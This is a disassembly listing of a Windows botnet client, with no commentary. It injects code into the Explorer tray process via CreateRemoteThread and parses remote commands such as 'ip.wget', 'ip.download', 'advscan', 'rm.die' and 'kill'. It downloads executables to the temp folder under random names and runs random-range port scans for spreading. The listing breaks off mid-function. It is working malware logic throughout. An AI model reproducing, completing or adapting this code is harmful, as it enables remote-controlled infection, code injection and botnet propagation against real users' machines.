push offset aShell_traywnd ; "Shell_TrayWnd"
call ds:dword_47B6BC ; FindWindowA
push eax
call ds:dword_47B6C0 ; GetWindowThreadProcessId
push [ebp+var_C]
push edi
push 1F0FFFh
call ds:dword_47B4F0 ; OpenProcess
mov ebx, eax
cmp ebx, edi
mov [ebp+var_4], ebx
jz loc_4019D7
mov esi, 103h
lea eax, [ebp+var_430]
push esi
push eax
push edi
call ds:dword_47B510 ; GetModuleFileNameA
lea eax, [ebp+var_430]
push esi
mov esi, ds:dword_47B614
push eax
lea eax, [ebp+var_310]
push eax
call esi ; dword_47B614
push 1FFh
lea eax, [ebp+var_20C]
push [ebp+arg_0]
push eax
call esi ; dword_47B614
add esp, 18h
mov esi, 320h
push 4
push 1000h
push esi
push edi
mov edi, ds:dword_47B4F4
push ebx
call edi ; dword_47B4F4
lea ecx, [ebp+var_8]
mov [ebp+arg_0], eax
push ecx
lea ecx, [ebp+var_32C]
push esi
push ecx
push eax
push ebx
mov ebx, ds:dword_47B508
call ebx ; dword_47B508
mov esi, offset j_nullsub_2
push 40h
sub esi, offset sub_4012F8
push 1000h
push esi
push 0
push [ebp+var_4]
call edi ; dword_47B4F4
mov edi, eax
lea eax, [ebp+var_8]
push eax
push esi
push offset sub_4012F8
push edi
push [ebp+var_4]
call ebx ; dword_47B508
push 1
call sub_401226
test eax, eax
pop ecx
jle short loc_4019DB
loc_4019D7: ; CODE XREF: sub_40186B+BF�j
xor al, al
jmp short loc_401A15
; ---------------------------------------------------------------------------
loc_4019DB: ; CODE XREF: sub_40186B+16A�j
push offset dword_40F5CC
push 1
call sub_401073
pop ecx
mov esi, eax
pop ecx
xor eax, eax
push eax
push eax
push [ebp+arg_0]
push edi
push eax
push eax
push [ebp+var_4]
call ds:dword_47B4FC ; CreateRemoteThread
imul esi, 220h
push [ebp+var_4]
mov dword_427630[esi], eax
call ds:dword_47B520 ; CloseHandle
mov al, 1
loc_401A15: ; CODE XREF: sub_40186B+16E�j
pop edi
pop esi
pop ebx
leave
retn
sub_40186B endp
; ---------------------------------------------------------------------------
db 6Bh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A85 proc near ; CODE XREF: sub_40100F�j
var_554 = byte ptr -554h
var_154 = dword ptr -154h
var_54 = byte ptr -54h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 554h
push ebx
push esi
push edi
lea eax, [ebp+var_554]
push [ebp+arg_0]
push eax
call sub_40C25E ; strcpy
mov al, [ebp+var_554]
pop ecx
cmp al, byte_40FB8B
pop ecx
jnz loc_401B4F
push 40h
lea eax, [ebp+var_154]
push [ebp+arg_0]
push eax
call sub_4011A9
mov ebx, eax
lea eax, [ebp+var_154]
push ebx
push eax
lea eax, [ebp+var_54]
push eax
call sub_401285
add esp, 18h
cmp [ebp+var_154], 0
mov esi, eax
lea edi, [ebp+var_54]
push 15h
pop ecx
rep movsd
jz short loc_401B4F
mov eax, [ebp+var_154]
mov al, [eax]
cmp al, byte_40FB8B
jnz short loc_401B33
push [ebp+arg_10]
inc [ebp+var_154]
lea eax, [ebp+var_554]
lea esi, [ebp+var_54]
sub esp, 54h
push 15h
pop ecx
mov edi, esp
push [ebp+arg_8]
rep movsd
push [ebp+arg_4]
push eax
lea eax, [ebp+var_154]
push ebx
push eax
call sub_401023
add esp, 6Ch
jmp short loc_401B4F
; ---------------------------------------------------------------------------
loc_401B33: ; CODE XREF: sub_401A85+77�j
cmp [ebp+arg_C], 0
jnz short loc_401B4F
mov eax, [ebp+arg_4]
push offset dword_40F7DC
push dword ptr [eax+0Ch]
push [ebp+arg_8]
call sub_40104B
add esp, 0Ch
loc_401B4F: ; CODE XREF: sub_401A85+29�j
; sub_401A85+67�j ...
push 1
pop eax
pop edi
pop esi
pop ebx
leave
retn
sub_401A85 endp
; ---------------------------------------------------------------------------
db 34h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B8B proc near ; CODE XREF: sub_401023�j
var_2E8 = byte ptr -2E8h
var_1E4 = byte ptr -1E4h
var_E0 = byte ptr -0E0h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_48 = dword ptr 50h
arg_4C = dword ptr 54h
arg_50 = dword ptr 58h
arg_54 = dword ptr 5Ch
arg_58 = dword ptr 60h
arg_68 = dword ptr 70h
push ebp
mov ebp, esp
sub esp, 2E8h
push ebx
xor ebx, ebx
cmp [ebp+arg_68], ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, ds:dword_47B4E0
jz short loc_401C0D
push dword ptr [esi]
push offset dword_40E004
call edi ; dword_47B4E0
test eax, eax
jz loc_402893
push dword ptr [esi]
push offset dword_40E00C
call edi ; dword_47B4E0
test eax, eax
jz loc_402893
push dword ptr [esi]
push offset aL_out ; "l.out"
call edi ; dword_47B4E0
test eax, eax
jz loc_402893
push dword ptr [esi]
push offset aLo ; "lo"
call edi ; dword_47B4E0
test eax, eax
jz loc_402893
push dword ptr [esi]
push offset aRm_die ; "rm.die"
call edi ; dword_47B4E0
test eax, eax
jz loc_402893
push dword ptr [esi]
push offset aRm_now ; "rm.now"
call edi ; dword_47B4E0
test eax, eax
jz loc_402893
loc_401C0D: ; CODE XREF: sub_401B8B+1A�j
cmp [ebp+arg_20], ebx
jz loc_401CFC
push dword ptr [esi]
push offset aThreads ; "threads"
call edi ; dword_47B4E0
test eax, eax
jz loc_401CF3
push dword ptr [esi]
push offset aT ; "t"
call edi ; dword_47B4E0
test eax, eax
jz loc_401CF3
push dword ptr [esi]
push offset aIp_wget ; "ip.wget"
call edi ; dword_47B4E0
test eax, eax
jz loc_401CEC
push dword ptr [esi]
push offset aIp_download ; "ip.download"
call edi ; dword_47B4E0
test eax, eax
jz loc_401CEC
push dword ptr [esi]
push offset aR0flz_updt ; "r0flz.updt"
call edi ; dword_47B4E0
test eax, eax
jz short loc_401CC8
push dword ptr [esi]
push offset aR4wr_nb ; "r4wr.nb"
call edi ; dword_47B4E0
test eax, eax
jz short loc_401CC8
push dword ptr [esi]
push offset aAdvscan ; "advscan"
call edi ; dword_47B4E0
test eax, eax
jz short loc_401C8E
push dword ptr [esi]
push offset aAsc ; "asc"
call edi ; dword_47B4E0
test eax, eax
jnz short loc_401CFC
loc_401C8E: ; CODE XREF: sub_401B8B+F4�j
mov esi, offset aSc ; "sc"
mov edi, [ebp+arg_C]
push esi
push 7
push ebx
push [ebp+arg_1C]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi+0Ch]
call sub_4012D0
push esi
push 8
push ebx
push [ebp+arg_1C]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi+0Ch]
call sub_4012D0
add esp, 38h
jmp loc_402893
; ---------------------------------------------------------------------------
loc_401CC8: ; CODE XREF: sub_401B8B+DA�j
; sub_401B8B+E7�j
push offset aUp ; "up"
loc_401CCD: ; CODE XREF: sub_401B8B+166�j
push 3
loc_401CCF: ; CODE XREF: sub_401B8B+16F�j
push ebx
mov eax, [ebp+arg_C]
push [ebp+arg_1C]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [eax+0Ch]
call sub_4012D0
add esp, 1Ch
jmp loc_402893
; ---------------------------------------------------------------------------
loc_401CEC: ; CODE XREF: sub_401B8B+B8�j
; sub_401B8B+C9�j
push offset aDl ; "dl"
jmp short loc_401CCD
; ---------------------------------------------------------------------------
loc_401CF3: ; CODE XREF: sub_401B8B+96�j
; sub_401B8B+A7�j
push offset aTlist ; "tlist"
push 2
jmp short loc_401CCF
; ---------------------------------------------------------------------------
loc_401CFC: ; CODE XREF: sub_401B8B+85�j
; sub_401B8B+101�j
push dword ptr [esi]
push offset aL_out ; "l.out"
call edi ; dword_47B4E0
test eax, eax
jz loc_4027F9
push dword ptr [esi]
push offset aLo ; "lo"
call edi ; dword_47B4E0
test eax, eax
jz loc_4027F9
push offset aRm_die ; "rm.die"
push dword ptr [esi]
call edi ; dword_47B4E0
test eax, eax
jz loc_4027A6
push offset aRm_now ; "rm.now"
push dword ptr [esi]
call edi ; dword_47B4E0
test eax, eax
jz loc_4027A6
push offset aThreads ; "threads"
push dword ptr [esi]
call edi ; dword_47B4E0
test eax, eax
jz loc_402605
push offset aT ; "t"
push dword ptr [esi]
call edi ; dword_47B4E0
test eax, eax
jz loc_402605
push dword ptr [esi]
push offset aIp_wget ; "ip.wget"
call edi ; dword_47B4E0
test eax, eax
jz loc_4024F3
push dword ptr [esi]
push offset aIp_download ; "ip.download"
call edi ; dword_47B4E0
test eax, eax
jz loc_4024F3
push dword ptr [esi]
push offset aStaticftp ; "staticftp"
call edi ; dword_47B4E0
test eax, eax
jz loc_402466
push dword ptr [esi]
push offset aSftp ; "sftp"
call edi ; dword_47B4E0
test eax, eax
jz loc_402466
push dword ptr [esi]
push offset aHttp ; "http"
call edi ; dword_47B4E0
test eax, eax
jnz loc_401E46
mov eax, [esi+4]
cmp eax, ebx
jz loc_402893
push offset aStop ; "stop"
push eax
call edi ; dword_47B4E0
test eax, eax
jnz short loc_401E01
cmp [ebp+arg_14], ebx
mov byte_4138FC, bl
jnz loc_402893
cmp [ebp+arg_1C], ebx
jz loc_402893
push offset dword_40FA6C
loc_401DEB: ; CODE XREF: sub_401B8B+5C3�j
; sub_401B8B+69A�j ...
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push [ebp+arg_10]
call sub_40104B
add esp, 0Ch
jmp loc_402893
; ---------------------------------------------------------------------------
loc_401E01: ; CODE XREF: sub_401B8B+241�j
mov byte_4138FC, 1
push dword ptr [esi+4]
mov esi, offset dword_413818
push esi
call sub_40C25E ; strcpy
cmp [ebp+arg_14], ebx
pop ecx
pop ecx
jnz loc_402893
cmp [ebp+arg_1C], ebx
jz loc_402893
push esi
push offset dword_40FA54
loc_401E30: ; CODE XREF: sub_401B8B+316�j
; sub_401B8B+508�j ...
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push [ebp+arg_10]
call sub_40104B
add esp, 10h
jmp loc_402893
; ---------------------------------------------------------------------------
loc_401E46: ; CODE XREF: sub_401B8B+226�j
push dword ptr [esi]
push offset aAdvscan ; "advscan"
call edi ; dword_47B4E0
test eax, eax
jz loc_40203F
push dword ptr [esi]
push offset aAsc ; "asc"
call edi ; dword_47B4E0
test eax, eax
jz loc_40203F
push dword ptr [esi]
push offset aR0flz_updt ; "r0flz.updt"
call edi ; dword_47B4E0
test eax, eax
jz short loc_401E89
push dword ptr [esi]
push offset aR4wr_nb ; "r4wr.nb"
call edi ; dword_47B4E0
test eax, eax
jz short loc_401E89
xor eax, eax
jmp loc_402896
; ---------------------------------------------------------------------------
loc_401E89: ; CODE XREF: sub_401B8B+2E8�j
; sub_401B8B+2F5�j
cmp [esi+4], ebx
jnz short loc_401EA3
cmp [ebp+arg_14], ebx
jnz loc_402893
push offset dword_4101EC
loc_401E9C: ; CODE XREF: sub_401B8B+A75�j
push offset dword_40F790
jmp short loc_401E30
; ---------------------------------------------------------------------------
loc_401EA3: ; CODE XREF: sub_401B8B+301�j
mov eax, [esi+8]
cmp eax, ebx
jz short loc_401EBA
push eax
push offset aUCantStopUs ; "u-cant-stop-us"
call edi ; dword_47B4E0
test eax, eax
jz loc_402893
loc_401EBA: ; CODE XREF: sub_401B8B+31D�j
push 3
call sub_401226
cmp eax, ebx
pop ecx
jle short loc_401EF5
cmp [ebp+arg_14], ebx
jnz loc_402893
push eax
push offset aTt ; "tt"
push offset dword_4101EC
loc_401EDA: ; CODE XREF: sub_401B8B+99A�j
; sub_401B8B+B5F�j
push offset aSSARunD_ ; "%s %s a run: <%d>."
loc_401EDF: ; CODE XREF: sub_401B8B+48F�j
; sub_401B8B+4AF�j ...
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push [ebp+arg_10]
call sub_40104B
add esp, 18h
jmp loc_402893
; ---------------------------------------------------------------------------
loc_401EF5: ; CODE XREF: sub_401B8B+339�j
lea eax, [ebp+var_2E8]
push eax
push 104h
call ds:dword_47B4D8 ; GetTempPathA
mov edi, ds:dword_47B5EC
call edi ; dword_47B5EC
push 9
cdq
pop ecx
idiv ecx
push edx
call edi ; dword_47B5EC
push 9
cdq
pop ecx
idiv ecx
push edx
call edi ; dword_47B5EC
push 9
cdq
pop ecx
idiv ecx
push edx
call edi ; dword_47B5EC
push 9
cdq
pop ecx
idiv ecx
push edx
call edi ; dword_47B5EC
push 9
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_2E8]
push edx
push eax
lea eax, [ebp+var_1E4]
push offset aSeme_DDDDD_exe ; "%seme_%d%d%d%d%d.exe"
push eax
call ds:dword_47B5FC ; sprintf
mov eax, [ebp+arg_10]
mov [ebp+var_D4], eax
mov eax, [ebp+arg_14]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_1C]
mov [ebp+var_20], eax
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_D0]
push eax
call sub_40C25E ; strcpy
lea ecx, [ebp+var_1E4]
mov eax, [esi+4]
mov [ebp+var_48], ecx
xor ecx, ecx
cmp [esi+0Ch], ebx
mov edi, offset dword_4101EC
mov [ebp+var_4C], eax
mov [ebp+var_40], 1
setnz cl
mov [ebp+var_34], ecx
lea ecx, [ebp+var_1E4]
push ecx
push eax
push edi
push offset aSDlingFromSToS ; "%s dling from: %s to: %s."
push 3
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
call sub_401073
add esp, 3Ch
mov [ebp+var_50], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_D4]
push ebx
push eax
push offset sub_401041
push ebx
push ebx
call ds:dword_47B4DC ; CreateThread
mov ecx, [ebp+var_50]
imul ecx, 220h
cmp eax, ebx
mov dword_427630[ecx], eax
jz short loc_40201F
loc_401FED: ; CODE XREF: sub_401B8B+46F�j
cmp [ebp+var_18], ebx
jnz short loc_401FFC
push 32h
call ds:dword_47B4EC ; Sleep
jmp short loc_401FED
; ---------------------------------------------------------------------------
loc_401FFC: ; CODE XREF: sub_401B8B+465�j
cmp [ebp+arg_14], ebx
jnz loc_402893
cmp [ebp+arg_1C], ebx
jz loc_402893
push [ebp+var_48]
push dword ptr [esi+4]
push edi
push offset aSDlingFromSToS ; "%s dling from: %s to: %s."
jmp loc_401EDF
; ---------------------------------------------------------------------------
loc_40201F: ; CODE XREF: sub_401B8B+460�j
; sub_401B8B+A2F�j
cmp [ebp+arg_14], ebx
jnz loc_402893
call ds:dword_47B4E4 ; RtlGetLastWin32Error
push eax
push offset aTt ; "tt"
push edi
loc_402035: ; CODE XREF: sub_401B8B+C16�j
push offset aSFToSSED_ ; "%s F to s %s, e: <%d>."
jmp loc_401EDF
; ---------------------------------------------------------------------------
loc_40203F: ; CODE XREF: sub_401B8B+2C6�j
; sub_401B8B+2D7�j
cmp [esi+4], ebx
jz loc_402893
cmp [esi+8], ebx
jz loc_402893
cmp [esi+0Ch], ebx
jz loc_402893
cmp [esi+10h], ebx
jz loc_402893
push 7
call sub_4010AF
push dword ptr [esi+8]
mov [ebp+arg_68], eax
call ds:dword_47B600 ; atoi
add eax, [ebp+arg_68]
pop ecx
pop ecx
cmp eax, 100h
jle short loc_402098
cmp [ebp+arg_14], ebx
jnz loc_402893
push [ebp+arg_68]
push offset aAlreadyScannin ; "Already scanning with %d threads. Too m"...
jmp loc_401E30
; ---------------------------------------------------------------------------
loc_402098: ; CODE XREF: sub_401B8B+4F5�j
push dword ptr [esi+4]
call ds:dword_47B600 ; atoi
push dword ptr [esi+8]
movzx eax, ax
mov [ebp+var_50], eax
call ds:dword_47B600 ; atoi
push dword ptr [esi+0Ch]
mov [ebp+var_38], eax
call ds:dword_47B600 ; atoi
add esp, 0Ch
cmp eax, 3
mov [ebp+var_4C], eax
jnb short loc_4020CD
push 3
pop eax
mov [ebp+var_4C], eax
loc_4020CD: ; CODE XREF: sub_401B8B+53A�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_4020D7
mov [ebp+var_4C], ecx
loc_4020D7: ; CODE XREF: sub_401B8B+547�j
push dword ptr [esi+10h]
call ds:dword_47B600 ; atoi
mov [ebp+var_48], eax
mov eax, 270Fh
cmp [ebp+var_48], eax
pop ecx
jbe short loc_4020F1
mov [ebp+var_48], eax
loc_4020F1: ; CODE XREF: sub_401B8B+561�j
or [ebp+var_34], 0FFFFFFFFh
cmp dword_412E48, ebx
mov [ebp+arg_0], ebx
jz short loc_40213B
mov [ebp+arg_68], offset dword_412E48
loc_402107: ; CODE XREF: sub_401B8B+598�j
mov eax, [ebp+arg_68]
push dword ptr [esi+4]
add eax, 0FFFFFFD0h
push eax
call edi ; dword_47B4E0
test eax, eax
jz short loc_402127
add [ebp+arg_68], 3Ch
inc [ebp+arg_0]
mov eax, [ebp+arg_68]
cmp [eax], ebx
jnz short loc_402107
jmp short loc_40213B
; ---------------------------------------------------------------------------
loc_402127: ; CODE XREF: sub_401B8B+58A�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_34], eax
imul ecx, 3Ch
mov ecx, dword_412E48[ecx]
mov [ebp+var_50], ecx
loc_40213B: ; CODE XREF: sub_401B8B+573�j
; sub_401B8B+59A�j
cmp [ebp+var_50], ebx
jnz short loc_402153
cmp [ebp+arg_14], ebx
jnz loc_402893
push offset aFailedToStartS ; "Failed to start scan, port is invalid."
jmp loc_401DEB
; ---------------------------------------------------------------------------
loc_402153: ; CODE XREF: sub_401B8B+5B3�j
mov eax, [esi+14h]
cmp eax, ebx
jz loc_4021EE
push eax
push offset aX_x_x_x ; "x.x.x.x"
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4021C0
call ds:dword_47B4E8 ; GetTickCount
push eax
call ds:dword_47B5F8 ; srand
mov esi, ds:dword_47B5EC
pop ecx
call esi ; dword_47B5EC
cdq
mov edi, 0F0h
loc_40218B: ; CODE XREF: sub_401B8B+60F�j
mov ecx, edi
idiv ecx
add edx, 4
cmp edx, 7Fh
jnz short loc_40219C
call esi ; dword_47B5EC
cdq
jmp short loc_40218B
; ---------------------------------------------------------------------------
loc_40219C: ; CODE XREF: sub_401B8B+60A�j
push edx
push offset aD_x_x_x ; "%d.x.x.x"
lea eax, [ebp+var_E0]
push 10h
push eax
call ds:dword_47B620 ; _snprintf
add esp, 10h
loc_4021B4: ; CODE XREF: sub_401B8B+7A4�j
; sub_401B8B+7AC�j ...
mov [ebp+var_28], 1
jmp loc_402360
; ---------------------------------------------------------------------------
loc_4021C0: ; CODE XREF: sub_401B8B+5E2�j
push dword ptr [esi+14h]
lea eax, [ebp+var_E0]
push 10h
push eax
call ds:dword_47B620 ; _snprintf
push 78h
push dword ptr [esi+14h]
call ds:dword_47B608 ; strchr
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_28], eax
jmp loc_402360
; ---------------------------------------------------------------------------
loc_4021EE: ; CODE XREF: sub_401B8B+5CD�j
cmp [ebp+arg_58], ebx
jnz short loc_40222A
cmp [ebp+arg_48], ebx
jnz loc_40229B
cmp [ebp+arg_4C], ebx
jnz loc_40229B
cmp [ebp+arg_50], ebx
jnz loc_40229B
cmp [ebp+arg_54], ebx
jnz loc_40229B
cmp [ebp+arg_14], ebx
jnz loc_402893
push offset aFailedToStar_0 ; "Failed to start scan, no IP specified."
jmp loc_401DEB
; ---------------------------------------------------------------------------
loc_40222A: ; CODE XREF: sub_401B8B+666�j
cmp [ebp+arg_48], ebx
jz short loc_402233
push 1
jmp short loc_402243
; ---------------------------------------------------------------------------
loc_402233: ; CODE XREF: sub_401B8B+6A2�j
cmp [ebp+arg_4C], ebx
jz short loc_40223C
push 2
jmp short loc_402243
; ---------------------------------------------------------------------------
loc_40223C: ; CODE XREF: sub_401B8B+6AB�j
cmp [ebp+arg_50], ebx
jz short loc_402288
push 3
loc_402243: ; CODE XREF: sub_401B8B+6A6�j
; sub_401B8B+6AF�j
mov esi, [ebp+arg_54]
pop eax
push eax
push esi
push offset dword_4136BC
call sub_4010A0
add esp, 0Ch
cmp eax, ebx
jz short loc_402275
push 10h
push eax
lea eax, [ebp+var_E0]
push eax
call ds:dword_47B614 ; strncpy
add esp, 0Ch
mov [ebp+var_28], esi
jmp loc_402360
; ---------------------------------------------------------------------------
loc_402275: ; CODE XREF: sub_401B8B+6CD�j
cmp [ebp+arg_14], ebx
jnz loc_402893
push offset aCouldNotParseE ; "Could not parse external IP."
jmp loc_401DEB
; ---------------------------------------------------------------------------
loc_402288: ; CODE XREF: sub_401B8B+6B4�j
cmp [ebp+arg_14], ebx
jnz loc_402893
push offset aNoSubnetClassS ; "No subnet class specified, try \"-a\" or "...
jmp loc_401DEB
; ---------------------------------------------------------------------------
loc_40229B: ; CODE XREF: sub_401B8B+66B�j
; sub_401B8B+674�j ...
mov ecx, [ebp+arg_10]
push 10h
pop esi
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_14]
push eax
mov [ebp+arg_0], esi
call sub_4011FE
push eax
call dword_413E10 ; getsockname
cmp [ebp+arg_48], ebx
jz short loc_4022C6
and [ebp+var_10], 0FFh
jmp short loc_4022DB
; ---------------------------------------------------------------------------
loc_4022C6: ; CODE XREF: sub_401B8B+730�j
cmp [ebp+arg_4C], ebx
jz short loc_4022D2
and word ptr [ebp+var_10+2], 0
jmp short loc_4022DB
; ---------------------------------------------------------------------------
loc_4022D2: ; CODE XREF: sub_401B8B+73E�j
cmp [ebp+arg_50], ebx
jz short loc_4022DB
and byte ptr [ebp+var_10+3], 0
loc_4022DB: ; CODE XREF: sub_401B8B+739�j
; sub_401B8B+745�j ...
push esi
push [ebp+var_10]
call dword_413F48 ; inet_ntoa
push eax
lea eax, [ebp+var_E0]
push eax
call ds:dword_47B614 ; strncpy
add esp, 0Ch
cmp [ebp+arg_54], ebx
jz short loc_40235D
xor edi, edi
cmp [ebp+arg_48], ebx
jz short loc_402306
push 3
jmp short loc_402316
; ---------------------------------------------------------------------------
loc_402306: ; CODE XREF: sub_401B8B+775�j
cmp [ebp+arg_4C], ebx
jz short loc_40230F
push 2
jmp short loc_402316
; ---------------------------------------------------------------------------
loc_40230F: ; CODE XREF: sub_401B8B+77E�j
cmp [ebp+arg_50], ebx
jz short loc_402317
push 1
loc_402316: ; CODE XREF: sub_401B8B+779�j
; sub_401B8B+782�j
pop edi
loc_402317: ; CODE XREF: sub_401B8B+787�j
mov esi, ds:dword_47B60C
lea eax, [ebp+var_E0]
push 30h
push eax
call esi ; dword_47B60C
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+arg_68+3], bl
jle loc_4021B4
loc_402335: ; CODE XREF: sub_401B8B+7CB�j
cmp eax, ebx
jz loc_4021B4
mov byte ptr [eax], 78h
lea eax, [ebp+var_E0]
push 30h
push eax
call esi ; dword_47B60C
inc byte ptr [ebp+arg_68+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_68+3]
cmp ecx, edi
jl short loc_402335
jmp loc_4021B4
; ---------------------------------------------------------------------------
loc_40235D: ; CODE XREF: sub_401B8B+76E�j
mov [ebp+var_28], ebx
loc_402360: ; CODE XREF: sub_401B8B+630�j
; sub_401B8B+65E�j ...
mov eax, [ebp+arg_1C]
mov edi, [ebp+arg_14]
mov [ebp+var_2C], eax
mov eax, [ebp+arg_10]
mov [ebp+var_18], eax
mov eax, dword_413814
imul eax, 188h
add eax, offset word_40FD72
mov [ebp+var_30], edi
push eax
lea eax, [ebp+var_D0]
push eax
call sub_40C25E ; strcpy
cmp [ebp+var_28], ebx
pop ecx
pop ecx
mov eax, offset aRandom ; "Random"
jnz short loc_4023A0
mov eax, offset aSequential ; "Sequential"
loc_4023A0: ; CODE XREF: sub_401B8B+80E�j
push [ebp+var_38]
lea ecx, [ebp+var_E0]
mov esi, offset aSPortScanStart ; "%s Port Scan started on %s:%d with a de"...
push [ebp+var_48]
push [ebp+var_4C]
push [ebp+var_50]
push ecx
push eax
push esi
push 7
call sub_401073
add esp, 20h
mov [ebp+var_44], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E0]
push ebx
push eax
push offset sub_401307
push ebx
push ebx
call ds:dword_47B4DC ; CreateThread
mov ecx, [ebp+var_44]
imul ecx, 220h
cmp eax, ebx
mov dword_427630[ecx], eax
jz short loc_40244D
loc_4023F3: ; CODE XREF: sub_401B8B+875�j
cmp [ebp+var_20], ebx
jnz short loc_402402
push 32h
call ds:dword_47B4EC ; Sleep
jmp short loc_4023F3
; ---------------------------------------------------------------------------
loc_402402: ; CODE XREF: sub_401B8B+86B�j
cmp edi, ebx
jnz loc_402893
cmp [ebp+arg_18], ebx
jnz loc_402893
cmp [ebp+var_28], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_402422
mov eax, offset aSequential ; "Sequential"
loc_402422: ; CODE XREF: sub_401B8B+890�j
push [ebp+var_38]
lea ecx, [ebp+var_E0]
push [ebp+var_48]
push [ebp+var_4C]
push [ebp+var_50]
push ecx
push eax
mov eax, [ebp+arg_C]
push esi
push dword ptr [eax+0Ch]
push [ebp+arg_10]
call sub_40104B
add esp, 24h
jmp loc_402893
; ---------------------------------------------------------------------------
loc_40244D: ; CODE XREF: sub_401B8B+866�j
cmp edi, ebx
jnz loc_402893
call ds:dword_47B4E4 ; RtlGetLastWin32Error
push eax
push offset aFailedToStar_1 ; "Failed to start scan thread, error: <%d"...
jmp loc_401E30
; ---------------------------------------------------------------------------
loc_402466: ; CODE XREF: sub_401B8B+204�j
; sub_401B8B+215�j
mov eax, [esi+4]
cmp eax, ebx
jz loc_402893
cmp [esi+8], ebx
jz loc_402893
cmp [esi+0Ch], ebx
jz loc_402893
cmp [esi+10h], ebx
jz loc_402893
cmp [esi+14h], ebx
jz loc_402893
push eax
push offset dword_4136A0
call sub_40C25E ; strcpy
push dword ptr [esi+8]
push offset dword_4136CC
call sub_40C25E ; strcpy
push dword ptr [esi+0Ch]
push offset dword_41383C
call sub_40C25E ; strcpy
push dword ptr [esi+10h]
push offset dword_4138B8
call sub_40C25E ; strcpy
push dword ptr [esi+14h]
push offset dword_4137F8
call sub_40C25E ; strcpy
add esp, 28h
cmp [ebp+arg_14], ebx
jnz loc_402893
cmp [ebp+arg_1C], ebx
jz loc_402893
push offset dword_40F828
jmp loc_401DEB
; ---------------------------------------------------------------------------
loc_4024F3: ; CODE XREF: sub_401B8B+1E2�j
; sub_401B8B+1F3�j
cmp [esi+4], ebx
jz loc_4025F2
cmp [esi+8], ebx
jz loc_4025F2
push 3
call sub_401226
cmp eax, ebx
pop ecx
jle short loc_40252A
cmp [ebp+arg_14], ebx
jnz loc_402893
push eax
push offset aTt ; "tt"
push offset dword_4101E0
jmp loc_401EDA
; ---------------------------------------------------------------------------
loc_40252A: ; CODE XREF: sub_401B8B+984�j
mov eax, [ebp+arg_10]
mov [ebp+var_D4], eax
mov eax, [ebp+arg_14]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_1C]
mov [ebp+var_20], eax
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_D0]
push eax
call sub_40C25E ; strcpy
mov edi, [esi+8]
mov eax, [esi+4]
xor ecx, ecx
cmp [esi+0Ch], ebx
mov [ebp+var_48], edi
push edi
setnz cl
mov [ebp+var_3C], ecx
xor ecx, ecx
cmp [esi+10h], ebx
mov edi, offset dword_4101E0
push eax
push edi
setnz cl
push offset aSDlUrlSToS_ ; "%s DL URL: %s to: %s."
push 3
mov [ebp+var_4C], eax
mov [ebp+var_40], ebx
mov [ebp+var_38], ecx
call sub_401073
add esp, 1Ch
mov [ebp+var_50], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_D4]
push ebx
push eax
push offset sub_401041
push ebx
push ebx
call ds:dword_47B4DC ; CreateThread
mov ecx, [ebp+var_50]
imul ecx, 220h
cmp eax, ebx
mov dword_427630[ecx], eax
jz loc_40201F
loc_4025C0: ; CODE XREF: sub_401B8B+A42�j
cmp [ebp+var_18], ebx
jnz short loc_4025CF
push 32h
call ds:dword_47B4EC ; Sleep
jmp short loc_4025C0
; ---------------------------------------------------------------------------
loc_4025CF: ; CODE XREF: sub_401B8B+A38�j
cmp [ebp+arg_14], ebx
jnz loc_402893
cmp [ebp+arg_1C], ebx
jz loc_402893
push dword ptr [esi+8]
push dword ptr [esi+4]
push edi
push offset aSDlUrlSToS_ ; "%s DL URL: %s to: %s."
jmp loc_401EDF
; ---------------------------------------------------------------------------
loc_4025F2: ; CODE XREF: sub_401B8B+96B�j
; sub_401B8B+974�j
cmp [ebp+arg_14], ebx
jnz loc_402893
push offset dword_4101E0
jmp loc_401E9C
; ---------------------------------------------------------------------------
loc_402605: ; CODE XREF: sub_401B8B+1C0�j
; sub_401B8B+1D1�j
mov eax, [esi+4]
cmp eax, ebx
jz loc_4026CA
push eax
push offset aKill ; "kill"
call edi ; dword_47B4E0
test eax, eax
jz short loc_40262E
